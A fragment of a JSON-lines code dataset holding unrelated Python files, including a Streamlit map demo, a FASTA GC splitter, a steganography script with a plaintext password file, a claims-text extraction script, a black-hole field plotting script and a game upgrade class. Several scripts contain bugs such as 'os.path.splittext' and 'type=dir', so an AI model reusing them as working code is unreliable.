\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport altair as alt\nimport pydeck as pdk\n\nDATE_TIME = \"date/time\"\nDATA_URL = (\n \"covidnepal.csv\"\n)\n\n@st.cache(persist=True)\ndef load_data(nrows):\n data = pd.read_csv(DATA_URL, nrows=nrows)\n lowercase = lambda x: str(x).lower()\n data.rename(lowercase, axis=\"columns\", inplace=True)\n # data[DATE_TIME] = pd.to_datetime(data[DATE_TIME])\n return data\n\ndata = load_data(1000)\n\n##Raw Data\n'This is based on Imaginary Data', data\n\n\n\n'This is based on imaginary data. Made just for the purpose of demo', st.map(data)\n","sub_path":"src/covidnepal.py","file_name":"covidnepal.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"14588105","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : emilyenglish\nDate : 2019-02-26\nPurpose: fasta gc segregator\n\"\"\"\n\nimport argparse\nimport sys\nfrom collections import Counter\nimport os\nfrom Bio import SeqIO\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Segregate FASTA sequences by GC content',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n 'FASTA', metavar='FASTA', help='fasta file', nargs = '+')\n\n parser.add_argument(\n '-o',\n #SeqIO.write(record, out.fh, out_fmt)\n '--out_dir',\n help='A named string argument',\n metavar='DIR',\n type=dir,\n default='out')\n\n parser.add_argument(\n '-p',\n '--pct_gc',\n help='A named integer argument',\n metavar='int',\n type=int,\n default=50)\n\n \n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef warn(msg):\n \"\"\"Print a message to STDERR\"\"\"\n print(msg, file=sys.stderr)\n\n\n# --------------------------------------------------\ndef die(msg='Something bad happened'):\n \"\"\"warn() and exit with error\"\"\"\n warn(msg)\n sys.exit(1)\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n args = get_args()\n FASTA = args.FASTA\n out_dir = args.out_dir\n pct_gc = args.pct_gc\n \n files = 0\n totnum = 0\n for file in FASTA:\n if not os.path.isfile(file):\n print(('\"{}\" is not a file').format(file))\n else:\n num = 0\n files +=1\n basename = os.path.basename(file)\n highout_name = os.path.splittext(basename) [0] + '_' + 'high' +os.path.splittext(basename) [1]\n lowout_name = 
os.path.splitext(basename)[0] + '_' + 'low' + os.path.splitext(basename)[1]\n            high = os.path.join(out_dir, highout_name)\n            low = os.path.join(out_dir, lowout_name)\n            high_fh = open(high, 'wt')\n            low_fh = open(low, 'wt')\n            for record in SeqIO.parse(file, 'fasta'):\n                num += 1\n                seqlen = len(record.seq)\n                dna = Counter(record.seq)\n                gc = dna.get('G', 0) + dna.get('C', 0)\n                gc1 = int(gc / seqlen * 100)\n                print(record.seq)\n                print(gc1)\n                print('HIGH' if gc1 >= pct_gc else 'LOW')\n                if gc1 >= pct_gc:\n                    SeqIO.write(record, high_fh, \"fasta\")\n                else:\n                    SeqIO.write(record, low_fh, \"fasta\")\n# --------------------------------------------------\nif __name__ == '__main__':\n    main()\n","sub_path":"assignments/06-fasta-gc/gc.py","file_name":"gc.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"581937809","text":"import sys\n\ndef accum(s):\n    splitUp = list(s)\n    for (key, char) in enumerate(splitUp):\n        if char.islower(): \n            splitUp[key] = char.capitalize()\n        for i in range(key):\n            if char.islower():\n                splitUp[key] = splitUp[key] + char \n            else:\n                splitUp[key] = splitUp[key] + char.lower()\n    string = \"-\".join(splitUp)\n    return string\n\nprint(accum(sys.argv[1]))\n\n# def accum(s):\n#     enum = enumerate(s)\n#     string = '-'.join(c.upper() + c.lower() * i for (i, c) in enumerate(s))\n\n#     return string;\n","sub_path":"easy/accum.py","file_name":"accum.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"313865686","text":"from prime import permutations\nfrom time import time\n\nstart=time()\n\nP = {\n    3: lambda n: int(n * (n + 1) / 2),\n    4: lambda n: n ** 2,\n    5: lambda n: int(n * (3 * n - 1) / 2),\n    6: lambda n: n * (2 * n - 1),\n    7: lambda n: int(n * (5 * n - 3) / 2),\n    8: lambda n: n * (3 * n - 2),\n}\n\nB = {\n    x: [\n        P[x](n) for n in xrange(150)\n        if 999 < P[x](n) < 10000 and\n        P[x](n) % 100 > 9\n    ] for x in xrange(3, 9)\n}\n\nfor i in permutations(''.join(str(j) for j in xrange(3, 9))):\n    cycle = {x: ((int(i[x - 3]) - 2) % 6 + 3) for x in xrange(3, 9)}\n    first = int(i[0])\n    j = cycle[first]\n    c = 0\n    while j != first:\n        c += 1\n        j = cycle[j]\n    if c != 5:\n        continue\n    anticycle = {value: key for key, value in cycle.iteritems()}\n    \n    C = B\n    while not all(len(s) == 1 for s in C.values()):\n        l = sum(len(x) for x in C.values())\n        C = {\n            x: [\n                n for n in C[x] if\n                any(n % 100 == m / 100 for m in C[cycle[x]]) and\n                any(n / 100 == m % 100 for m in C[anticycle[x]])\n            ] for x in xrange(3, 9)\n        }\n        if l == sum(len(x) for x in C.values()):\n            break\n    else:\n        print('{}'.format(sum(list(x)[0] for x in C.values())))\n\nprint(time() - start)\n","sub_path":"61.py","file_name":"61.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"265262538","text":"import cv2\n\ndef write_key(key):\n    file = open('key.txt','w')\n    file.write(key)\n    file.close()\n\ndef check_spell():\n    file = open('key.txt','r')\n    return (file.read())\n\ndef binarize(message):\n    for c in message:\n        yield ord(c)\n\ndef get_image(image_location):\n    img = cv2.imread(image_location)\n    return img\n\ndef encode(image_location, message, key):\n    write_key(key)\n\n    img = get_image(image_location)\n    msg = binarize(message)\n\n    pattern = 8\n    for i in range(len(img)):\n
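        # Note (illustrative): this scheme stores each character's full ordinal in
        # the blue channel, so the payload is plainly visible in the pixel values;
        # a least-significant-bit variant, sketched a little further below, hides
        # one bit per byte instead.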
        for j in range(len(img[0])):\n            if (i + j + 1) % pattern == 0:  # precedence made explicit: 'i+1 * j+1' parses as i + j + 1\n                try:\n                    img[i-1][j-1][0] = next(msg)\n                except StopIteration:\n                    img[i-1][j-1][0] = 0\n    return img\n\ndef decode(img_loc, password):\n    key = check_spell()\n    img = get_image(img_loc)\n\n    if password != key:\n        print (\"Invalid password\")\n        return\n\n    pattern = 8\n    message = ''\n    for i in range(len(img)):\n        for j in range(len(img[0])):\n            if (i + j + 1) % pattern == 0:  # must visit the same positions encode() wrote; the original (i-1 * j-1) test scanned different pixels\n                if img[i-1][j-1][0] != 0:\n                    message = message + chr(img[i-1][j-1][0])\n                else:\n                    return message\n    return message\n\nimg = encode('lena.png','Hello World','There is a catcher in the rye')\ncv2.imwrite('modified.png', img)\nmessage = decode('modified.png','There is a catcher in the rye')\nprint (message)\n","sub_path":"Stego/stego.py","file_name":"stego.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"288735532","text":"#Title: Linear Search in unsorted array\n#Author:Jithin Zacharia\n#Date: 29 June 2017\n\n#getting values from the user\na=[]\nsize=input('Enter the size of the array')\nfor i in range(0,size):\n\telements=input('Enter the elements into the array')\n\ta.append(elements)\nprint (a)\n#getting the key value from the user\nkey=input('Please enter the item to be searched')\nfound = False\nfor j in range(0,size):\n\tif(key==a[j]):\n\t\tfound = True\n\t\tbreak\nif found:\n\tprint('Item found')\nelse:\n\tprint('Item not found')\n","sub_path":"Arrays/linear_search_array.py","file_name":"linear_search_array.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"515898602","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport re\r\n\r\n# read data\r\npersonsource='C:/Users/baili.lu/Documents/My Received Files/SI'\r\nclaimsource='C:/Users/baili.lu/Documents/My Received Files/SI Files'\r\n \r\npersondict = dict()\r\nfor root, dirs, filenames in os.walk(personsource):\r\n    for f in filenames:\r\n        date = None \r\n        #print(f)\r\n        tablename = f.replace('.csv','')\r\n        date = tablename[-8:]\r\n        date = date[4:]+date[:4]  # rearrange date from MDY to YMD\r\n        tablename = tablename[:-9]\r\n        tempdf = pd.read_csv(personsource+'/'+f, encoding = 'latin-1')\r\n        tempdf['File Date'] = date\r\n        persondict[date] = tempdf\r\n\r\n# concatenate files\r\nperson = pd.concat(persondict)\r\n\r\nclaimtable=pd.read_csv(claimsource+'/'+'ClaimsSent_01092017-01172017.csv')\r\n\r\nclaimtable['File Date']=claimtable['File Date'].apply(str)\r\n\r\npersontable=pd.merge(person,claimtable,on=['Claim Number','File Date'],how='left')\r\n\r\nfilter_colname=['Hits - Content','Hits - Rating Relevance','Claim Number', 'DataSet','File Date']\r\nfilter_col= [col for col in list(persontable) if col.startswith(tuple(filter_colname))]\r\n \r\nperson_hits=persontable[filter_col]\r\n\r\nstring='whitepages'\r\n\r\ndef contentextraction(r):\r\n    content = list()\r\n    for x in range(500):\r\n        if (r['Hits - Rating Relevance - ' + str(x+1)] in ['Very High','High']) and (string not in str(r['Hits - Content - ' + str(x+1)]).lower()):\r\n            content.append(str(r['Hits - Content - ' + str(x+1)]))\r\n    return ' '.join(content)\r\n\r\nperson_hits['contentextraction'] = person_hits.apply(contentextraction,axis=1)\r\n\r\n## no need\r\n#person_hits['HITS_Merge'] = person_hits.apply(lambda x: ' '.join(x.dropna().astype(str)),axis=1)\r\n#or\r\n#persontable['HITS_Merge'] = persontable[filter_col].apply(lambda x: ' 
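
# A compact least-significant-bit variant of the encode/decode pair above: it
# hides one payload bit per carrier byte, leaving the image visually unchanged.
# Self-contained sketch over a flat byte string (no OpenCV needed); all names
# are illustrative, not part of the original script.
def lsb_embed(carrier, payload):
    bits = [(b >> k) & 1 for b in payload for k in range(8)]
    out = bytearray(carrier)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit
    return bytes(out)

def lsb_extract(carrier, nbytes):
    bits = [byte & 1 for byte in carrier[:nbytes * 8]]
    return bytes(sum(bits[i * 8 + k] << k for k in range(8)) for i in range(nbytes))

cover = bytes(range(256)) * 4
secret = b'Hello World'
assert lsb_extract(lsb_embed(cover, secret), len(secret)) == secret
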
'.join(x.dropna().astype(str)),axis=1)\r\n\r\n\r\n#rule=re.compile('((?:[^A-Za-z\\s]|\\s)+)')\r\npattern=re.compile(\"[^a-zA-Z\\s]\")\r\n\r\n\r\nperson_hits['HITS_regex']=person_hits['contentextraction'].apply(lambda row: pattern.sub('',str(row)))\r\n\r\n\r\nperson_hits['HITS_content']=[' '.join(string.split()) for string in person_hits['HITS_regex']]\r\n\r\nperson_hits['HITS_content'].replace('', np.nan, inplace=True)\r\n\r\nperson_hits=person_hits.dropna(subset=['HITS_content'])\r\n \r\nperson_hits_out=person_hits[['Claim Number', 'File Date', 'HITS_content','DataSet_y']] \r\n \r\nperson_hits_out.to_csv(r'C:\\Users\\baili.lu\\Documents\\My Received Files\\SI\\person_hits.csv', sep=',',index=False)\r\n\r\n\r\n\r\n\r\n \r\n################### \r\n\r\n# summarize HITS relevance\r\n# not for dan\r\n#relevance_col= [col for col in list(person_hits) if col.startswith('Hits - Rating Relevance')]\r\n \r\n#person_relevance=persontable[relevance_col]\r\n\r\n#result=person_relevance.apply(pd.value_counts).sum(axis=1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#person_hits_out.loc[(person_hits_out['Claim Number']=='3007791792-1') & (person_hits_out['File Date']=='20170111')].to_csv('try.csv')\r\n\r\n\r\n\r\n#for col in relevance_col:\r\n# for i in person_hits[col]:\r\n# if i == \"Low\":\r\n# index=person_hits.iloc[i].index\r\n# for j in person_hits.columns:\r\n# if j[-3:]==col[-3:]:\r\n# person_hits.set_value(index,j,'')\r\n# index=0 \r\n# \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"person_hits.py","file_name":"person_hits.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416600772","text":"import yt\nfrom yt import derived_field\nfrom yt.units import cm\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nimport math\nfrom os import makedirs\nimport sys\nfrom scipy.interpolate import interp1d\nfrom scipy.optimize import curve_fit\nimport ctypes\n\nstart_time = time.time()\n\na_dirs = {}\na_dirs[\"0\"] = \"run0031_KNL_l0_m0_a0_Al0_mu0.4_M1_correct_Ylm\"\na_dirs[\"0.7\"] = \"run0028_KNL_l0_m0_a0.7_Al0_mu0.4_M1_correct_Ylm\"\na_dirs[\"0.99\"] = \"run0029_KNL_l0_m0_a0.99_Al0_mu0.4_M1_correct_Ylm\"\n\nz_position = 0.001\t# z position of slice\nnumber = 1550\ndt = 0.25\nt = number*dt\n\n# choose a values to plot\na_list = [\"0\"]\n\n# set centre\ncenter = [512.0, 512.0, 0]\n\n# set up parameters\nR_outer_horizon = 0.25\t# R_outer = r_+ / 4 ~= 1 / 4 for an extremal Kerr BH\nR_min = 0.25\nR_max = 450\nN_bins = 256\n\n#\ndata_root_path = \"/rds/user/dc-bamb1/rds-dirac-dp131/dc-bamb1/GRChombo_data/KerrSF\"\n\n# define true radial solution function\nM = 1\nmu = 0.4\nomega = 0.4\nKerrlib = ctypes.cdll.LoadLibrary('/home/dc-bamb1/GRChombo/Source/utils/KerrBH_Rfunc_lib.so')\nKerrlib.Rfunc.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_double, ctypes.c_double, ctypes.c_int, ctypes.c_int, ctypes.c_bool, ctypes.c_bool, ctypes.c_double]\nKerrlib.Rfunc.restype = ctypes.c_double\n\n#make_smoothed_profile(a_list[0], 20)\n#sys.exit()\n\n### derived fields\n# weighting field = (cell_volume)^(2/3) / (2*pi * r * dr) \n@derived_field(name = \"weighting_field\", units = \"\")\ndef _weighting_field(field, data):\n return pow(data[\"cell_volume\"].in_base(\"cgs\"),2.0/3) * N_bins / (2*math.pi* data[\"cylindrical_radius\"]*(R_max - R_min)*cm)\n\ndef get_data_v1(key, number):\n\tdata_sub_dir = a_dirs[key]\n\tdsi = yt.load(data_root_path + \"/\" + data_sub_dir + 
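
# The cleanup passes above (drop non-letters with pattern.sub, then collapse
# whitespace in a list comprehension) can be done with pandas' vectorised
# string methods in one chain; a sketch on a toy Series:
import pandas as pd

s = pd.Series(["Call 555-0100 now!", "  spaced   out  "])
cleaned = s.str.replace(r"[^a-zA-Z\s]", "", regex=True).str.split().str.join(" ")
# cleaned: ["Call now", "spaced out"]
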
\"/KerrSFp_{:06d}.3d.hdf5\".format(number))\n\tprint(\"loaded dataset number \" + str(number) + \" for \" + data_sub_dir) \n\tslice = dsi.r[:,:,z_position]\n\tslice.set_field_parameter(\"center\", center)\n\trp = yt.create_profile(slice, \"cylindrical_radius\", fields=[\"phi\"], n_bins=128, weight_field=\"weighting_field\", extrema={\"cylindrical_radius\" : (R_min, R_max)})\n\tphi = rp[\"phi\"].value\n\tR = rp.x.value\n\tprint(\"made profile\")\n\treturn (R, phi)\n\ndef get_data(key, number):\n\tdata_sub_dir = a_dirs[key]\n\tdsi = yt.load(data_root_path + \"/\" + data_sub_dir + \"/KerrSFp_{:06d}.3d.hdf5\".format(number))\n\tprint(\"loaded dataset number \" + str(number) + \" for \" + data_sub_dir)\n\tslice = dsi.r[:,:,z_position]\n\tslice.set_field_parameter(\"center\", center)\n\tphi = slice[\"phi\"].value.flatten()\n\tR = slice[\"spherical_radius\"].value.flatten()\n\tprint(\"made profile\")\n\treturn (R, phi)\n \nR, phi1 = get_data(a_list[0], number)\nprint(\"got profile for a=\" + a_list[0], flush=True)\nphi_list = [phi1]\nfor i in range(1, len(a_list)):\n\tphi = get_data(a_list[i], number)[1]\n\tphi_list.append(phi)\n\tprint(\"got profile for a=\" + a_list[i], flush=True)\n\n### plot phi profiles vs r_BS\ncolours = ['r', 'b', 'g']\n\n# make plot \nfor i in range(0, len(a_list)):\n\ta = a_list[i]\n\tr_plus = 1 + math.sqrt(1 - float(a)**2)\n\tr_minus = 1 - math.sqrt(1 - float(a)**2)\n\tr = R*(1 + r_plus/(4*R))**2\n\tlnr = np.log(r - r_plus)\n\tphi = phi_list[i]\n\t#r_star = r + ((r_plus**2)*np.log(r - r_plus) - (r_minus**2)*np.log(r - r_minus))/(r_plus - r_minus)\t\n\tplt.plot(lnr, phi, colours[i]+\".\", markersize=4, label=\"a = \" + a_list[i])\n\t# fit true solution to data\n\tdef true_stationary_phi(x, C1, C2):\n\t\t# x = ln(r - r_plus)\n\t\tr_BL = r_plus + np.exp(x)\n\t\tsol1 = np.zeros(r_BL.size)\n\t\tsol2 = np.zeros(r_BL.size)\n\t\tfor i in range(0, r_BL.size):\n \t\tsol1[i] = 100*Kerrlib.Rfunc(M, mu, omega, float(a), 0, 0, True, True, r_BL[i])\n \t\tsol2[i] = 100*Kerrlib.Rfunc(M, mu, omega, float(a), 0, 0, True, False, r_BL[i])\n\t\treturn C1*sol1 + C2*sol2\n\tpopt, pcov = curve_fit(true_stationary_phi, lnr, phi)\n\tlnr_fitted = np.linspace(np.min(lnr), np.max(lnr), 256) \n\tfitted_phi = true_stationary_phi(lnr_fitted, popt[0], popt[1])\n\tplt.plot(lnr_fitted, fitted_phi, \"k-\", label=\"fitted stationary solution, R1={:.2f} I1={:.2f} a ={:s}\".format(popt[0], popt[1], a_list[i]))\nplt.ylabel(\"$\\\\phi$\")\nplt.legend(fontsize=8)\n#plt.ylim((-5, 35))\ntitle = \"field profile, $L=0$, $M=1$, $m=0$, $M\\\\omega=M\\\\mu=1$ $z$={:.3}, time={:.1f}\".format(z_position, t) \nplt.title(title)\nplt.xlabel(\"$\\\\ln(r_{BL} - r_+)$\")\nplt.grid(axis=\"both\")\nplt.tight_layout()\n\nsave_root_path = \"/home/dc-bamb1/GRChombo/Analysis/plots/\" \nsave_name = \"phi_profile_vs_ln_r-r_plus_compare_a_t={:.2f}.png\".format(t)\nsave_path = save_root_path + save_name\nplt.savefig(save_path, transparent=False)\nplt.clf()\nprint(\"saved \" + str(save_path))\n\n","sub_path":"Analysis/scripts/old_scripts/radial_profile_phi_compare_a_v2.py","file_name":"radial_profile_phi_compare_a_v2.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"579549625","text":"# Typing imports\nfrom __future__ import annotations\n\nfrom ..cfg import bbData\nfrom .items import shipItem\nfrom ..baseClasses import serializable\nfrom .. 
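
# curve_fit, as used above, does nonlinear least squares on a model y = f(x, *p).
# A minimal standalone illustration that recovers two linear-combination
# weights, mirroring how C1 and C2 scale the two radial solutions in the fit:
import numpy as np
from scipy.optimize import curve_fit

def model(x, c1, c2):
    return c1 * np.sin(x) + c2 * np.cos(x)

xdata = np.linspace(0, 4, 50)
ydata = model(xdata, 2.0, -0.5)
popt, pcov = curve_fit(model, xdata, ydata)
assert np.allclose(popt, [2.0, -0.5], atol=1e-6)
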
import lib\n\n\nclass ShipUpgrade(serializable.Serializable):\n \"\"\"A ship upgrade that can be applied to shipItems, but cannot be unapplied again.\n There is no technical reason why a ship upgrade could not be removed, but from a game design perspective,\n it adds extra value and strategy to the decision to apply an upgrade.\n\n :var wiki: A web page to present as the upgrade's wikipedia article in its info page\n :vartype wiki: str\n :var hasWiki: Whether or not this upgrade's wiki attribute is populated\n :vartype hasWiki: bool\n :var name: The name of the upgrade. This must be unique.\n :vartype name: str\n :var shipToUpgradeValueMult: upgrades do not have a value, their value is calculated as a percentage of the value of the\n ship to be applied to. shipToUpgradeValueMult is that percentage multiplier.\n :vartype shipToUpgradeValueMult: float\n :var vendor: The manufacturer of this upgrade.\n :vartype vendor: str\n :var hasVendor: Whether or not this upgrade's vendor attribute is populated\n :vartype hasVendor: bool\n :var armour: An additive boost to the owning ship's armour\n :vartype armour: int\n :var armourMultiplier: A multiplier to apply to the ship's armour\n :vartype armourMultiplier: float\n :var cargo: An additive boost to the owning ship's cargo storage\n :vartype cargo: int\n :var cargoMultiplier: A multiplier to apply to the ship's cargo storage\n :vartype cargoMultiplier: float\n :var maxSecondaries: An additive boost to the number of secondary weapons equippable by the owning ship\n :vartype maxSecondaries: int\n :var maxSecondariesMultiplier: A multiplier to apply to the number of secondary weapons equippable by the ship\n :vartype maxSecondariesMultiplier: float\n :var handling: An additive boost to the owning ship's handling\n :vartype handling: int\n :var handlingMultiplier: A multiplier to apply to the ship's handling\n :vartype handlingMultiplier: float\n :var maxPrimaries: An additive boost to the number of primary weapons equippable by the owning ship\n :vartype maxPrimaries: int\n :var maxPrimariesMultiplier: A multiplier to apply to the number of primary weapons equippable by the ship\n :vartype maxPrimariesMultiplier: float\n :var maxTurrets: An additive boost to the maximum number of turrets equippable by the owning ship\n :vartype maxTurrets: int\n :var maxTurretsMultiplier: A multiplier to apply to the maximum number of turrets equippable by the ship\n :vartype maxTurretsMultiplier: float\n :var maxModules: An additive boost to the number of modules that the owning ship can equip\n :vartype maxModules: int\n :var maxModulesMultiplier: A multiplier to apply to the number of modules that the ship can equip\n :vartype maxModulesMultiplier: float\n :var techLevel: A rating from 1 to 10 of this upgrade's technological advancement. 
Used as a reference to compare\n against other ship upgrades.\n :vartype techLevel: int\n :var hasTechLevel: whether or not this ship upgrade has a tech level\n :vartype hasTechLevel: bool\n :var builtIn: Whether this upgrade is built into BountyBot (loaded in from bbData) or was custom spawned.\n :vartype builtIn: bool\n \"\"\"\n\n def __init__(self, name : str, shipToUpgradeValueMult : float, armour : int = 0.0, armourMultiplier : float = 1.0,\n cargo : int = 0, cargoMultiplier : float = 1.0, maxSecondaries : int = 0,\n maxSecondariesMultiplier : float = 1.0, handling : int = 0, handlingMultiplier : float = 1.0,\n maxPrimaries : int = 0, maxPrimariesMultiplier : float = 1.0, maxTurrets : int = 0,\n maxTurretsMultiplier : float = 1.0, maxModules : int = 0, maxModulesMultiplier : float = 1.0,\n vendor : str = \"\", wiki : str = \"\", techLevel : int = -1, builtIn : bool = False):\n \"\"\"\n :param str name: The name of the upgrade. This must be unique.\n :param float shipToUpgradeValueMult: upgrades do not have a value, their value is calculated as a percentage of the\n value of the ship to be applied to. shipToUpgradeValueMult is that\n percentage multiplier.\n :param str wiki: A web page to present as the upgrade's wikipedia article in its info page\n :param str vendor: The manufacturer of this upgrade.\n :param int armour: An additive boost to the owning ship's armour\n :param float armourMultiplier: A multiplier to apply to the ship's armour\n :param int cargo: An additive boost to the owning ship's cargo storage\n :param float cargoMultiplier: A multiplier to apply to the ship's cargo storage\n :param int maxSecondaries: An additive boost to the number of secondary weapons equippable by the owning ship\n :param float maxSecondariesMultiplier: A multiplier to apply to the number of secondary weapons equippable by the ship\n :param int handling: An additive boost to the owning ship's handling\n :param float handlingMultiplier: A multiplier to apply to the ship's handling\n :param int maxPrimaries: An additive boost to the number of primary weapons equippable by the owning ship\n :param float maxPrimariesMultiplier: A multiplier to apply to the number of primary weapons equippable by the ship\n :param int maxTurrets: An additive boost to the maximum number of turrets equippable by the owning ship\n :param float maxTurretsMultiplier: A multiplier to apply to the maximum number of turrets equippable by the ship\n :param int maxModules: An additive boost to the number of modules that the owning ship can equip\n :param float maxModulesMultiplier: A multiplier to apply to the number of modules that the ship can equip\n :param int techLevel: A rating from 1 to 10 of this upgrade's technological advancement. 
Used as a reference to\n compare against other ship upgrades.\n :param bool builtIn: Whether this upgrade is built into BountyBot (loaded in from bbData) or was custom spawned.\n \"\"\"\n self.name = name\n self.shipToUpgradeValueMult = shipToUpgradeValueMult\n self.vendor = vendor\n self.hasVendor = vendor != \"\"\n\n self.armour = armour\n self.armourMultiplier = armourMultiplier\n\n self.cargo = cargo\n self.cargoMultiplier = cargoMultiplier\n\n self.maxSecondaries = maxSecondaries\n self.maxSecondariesMultiplier = maxSecondariesMultiplier\n\n self.handling = handling\n self.handlingMultiplier = handlingMultiplier\n\n self.maxPrimaries = maxPrimaries\n self.maxPrimariesMultiplier = maxPrimariesMultiplier\n\n self.maxTurrets = maxTurrets\n self.maxTurretsMultiplier = maxTurretsMultiplier\n\n self.maxModules = maxModules\n self.maxModulesMultiplier = maxModulesMultiplier\n\n self.wiki = wiki\n self.hasWiki = wiki != \"\"\n\n self.techLevel = techLevel\n self.hasTechLevel = techLevel != -1\n\n self.builtIn = builtIn\n\n\n def __eq__(self, other : ShipUpgrade) -> bool:\n \"\"\"Decide whether two ship upgrades are the same, based purely on their name and object type.\n\n :param shipUpgrade other: The upgrade to compare this one against.\n :return: True if other is a shipUpgrade instance, and shares the same name as this upgrade\n :rtype: bool\n \"\"\"\n return type(self) == type(other) and self.name == other.name\n\n\n def valueForShip(self, ship : shipItem.Ship) -> int:\n \"\"\"Calculate the value of this ship upgrade, when it is to be applied to the given ship\n\n :param shipItem ship: The ship that the upgrade is to be applied to\n :return: The number of credits at which this upgrade is valued when being applied to ship\n :rtype: int\n \"\"\"\n return ship.value * self.shipToUpgradeValueMult\n\n\n def toDict(self, **kwargs) -> dict:\n \"\"\"Serialize this shipUpgrade into a dictionary for saving to file\n Contains all information needed to reconstruct this upgrade. 
If the upgrade is builtIn,\n        this includes only the upgrade name.\n\n        :return: A dictionary-serialized representation of this upgrade\n        :rtype: dict\n        \"\"\"\n\n        itemDict = {\"name\": self.name, \"builtIn\": self.builtIn}\n\n        if not self.builtIn:\n            if self.hasVendor:\n                itemDict[\"vendor\"] = self.vendor\n\n        if self.shipToUpgradeValueMult != 1.0:\n            itemDict[\"shipToUpgradeValueMult\"] = self.shipToUpgradeValueMult\n\n        if not self.builtIn:\n            additiveStats = { \"armour\": self.armour, \"cargo\": self.cargo, \"handling\": self.handling,\n                                \"maxSecondaries\": self.maxSecondaries, \"maxPrimaries\": self.maxPrimaries,\n                                \"maxTurrets\": self.maxTurrets, \"maxModules\": self.maxModules}\n            multiplierStats = { \"armour\": self.armourMultiplier, \"cargo\": self.cargoMultiplier,\n                                \"handling\": self.handlingMultiplier,\n                                \"maxSecondaries\": self.maxSecondariesMultiplier,\n                                \"maxPrimaries\": self.maxPrimariesMultiplier,\n                                \"maxTurrets\": self.maxTurretsMultiplier, \"maxModules\": self.maxModulesMultiplier}\n\n            for statName in additiveStats:\n                if additiveStats[statName] != 0:\n                    itemDict[statName] = additiveStats[statName]\n            for statName in multiplierStats:\n                if multiplierStats[statName] != 1:\n                    itemDict[statName] = multiplierStats[statName]\n\n        return itemDict\n\n\n    def statsStringShort(self) -> str:\n        \"\"\"Get a summary of the effects this upgrade will have on the owning ship, in string format.\n\n        :return: A string summary of the upgrade's effects\n        :rtype: str\n        \"\"\"\n        additiveStats = { \"Max secondaries\": self.maxSecondaries, \"Max primaries\": self.maxPrimaries,\n                            \"Max turrets\": self.maxTurrets, \"Max modules\": self.maxModules, \"Cargo\": self.cargo,\n                            \"Armour\": self.armour, \"Handling\": self.handling}\n\n        multiplierStats = { \"Max secondaries\": self.maxSecondariesMultiplier, \"Max primaries\": self.maxPrimariesMultiplier,\n                            \"Max turrets\": self.maxTurretsMultiplier, \"Max modules\": self.maxModulesMultiplier,\n                            \"Cargo\": self.cargoMultiplier, \"Armour\": self.armourMultiplier,\n                            \"Handling\": self.handlingMultiplier}\n\n        additiveStrs = (statName + \": \" + lib.stringTyping.formatAdditive(additiveStats[statName])\n                        for statName in additiveStats if additiveStats[statName] != 0)\n        multiplierStrs = (statName + \": \" + lib.stringTyping.formatMultiplier(multiplierStats[statName])\n                            for statName in multiplierStats if multiplierStats[statName] != 1)\n        statsStr = \", \".join(tuple(additiveStrs) + tuple(multiplierStrs))\n\n        return statsStr if len(statsStr) > 1 else \"*No effect*\"\n\n\n    @classmethod\n    def fromDict(cls, upgradeDict : dict, **kwargs) -> ShipUpgrade:\n        \"\"\"Factory function reconstructing a shipUpgrade object from its dictionary-serialized representation.\n        The opposite of shipUpgrade.toDict\n        If the upgrade is builtIn, return a reference to the pre-constructed upgrade object.\n\n        :param dict upgradeDict: A dictionary containing all information needed to produce the required shipUpgrade\n        :return: A shipUpgrade object as described by upgradeDict\n        :rtype: shipUpgrade\n        \"\"\"\n        if upgradeDict[\"builtIn\"]:\n            return bbData.builtInUpgradeObjs[upgradeDict[\"name\"]]\n        else:\n            return ShipUpgrade(upgradeDict[\"name\"], upgradeDict[\"shipToUpgradeValueMult\"],\n                                armour=upgradeDict[\"armour\"] if \"armour\" in upgradeDict else 0,\n                                armourMultiplier=upgradeDict[\"armourMultiplier\"] \\\n                                    if \"armourMultiplier\" in upgradeDict else 1.0,\n                                cargo=upgradeDict[\"cargo\"] if \"cargo\" in upgradeDict else 0,\n                                cargoMultiplier=upgradeDict[\"cargoMultiplier\"] \\\n                                    if 
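# --- Aside: statsStringShort only reports non-default stats and joins them
# into one line. A hedged sketch of that assembly with stand-in formatters
# (lib.stringTyping's formatAdditive/formatMultiplier are replaced by
# illustrative f-strings here):
additive = {"Armour": 5, "Cargo": 0, "Handling": 0}
multiplier = {"Armour": 1.0, "Cargo": 1.5, "Handling": 1.0}

parts = [f"{name}: +{value}" for name, value in additive.items() if value != 0]
parts += [f"{name}: x{value}" for name, value in multiplier.items() if value != 1]
print(", ".join(parts) or "*No effect*")  # Armour: +5, Cargo: x1.5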
